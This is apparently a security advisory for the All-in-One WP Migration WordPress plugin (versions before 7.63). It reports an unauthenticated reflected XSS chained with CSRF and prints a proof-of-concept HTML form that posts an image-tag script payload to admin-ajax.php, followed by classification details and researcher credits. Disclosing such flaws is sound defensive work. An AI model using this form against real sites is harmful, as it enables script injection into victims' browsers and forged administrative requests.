All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF
Proof of Concept (POC)
To reproduce the flaw, we can export all the website content by the plugin and insert an invalid name in the output file name.
By validating the vulnerability, it is possible to combine the attack with a CSRF, which will force the victim's browser to send a request with the payload.
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST"> <!-- Note: The secret key must be obtained through other means. It is stored in the site option `ai1wm_secret_key`, but is static for the lifetime of the site. --> <input type="hidden" name="secret_key" value="[secret_key]"> <input type="hidden" name="ai1wm_manual_export" value="1"> <input type="hidden" name="archive" value="<img src=x onclick=alert('XSS')>"> <input type="submit" value="Get rich!"> </form>
All-in-One WP Migration < 7.63
Type: Cross-Site Scripting
OWASP TOP 10: A03:2021-Injection
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).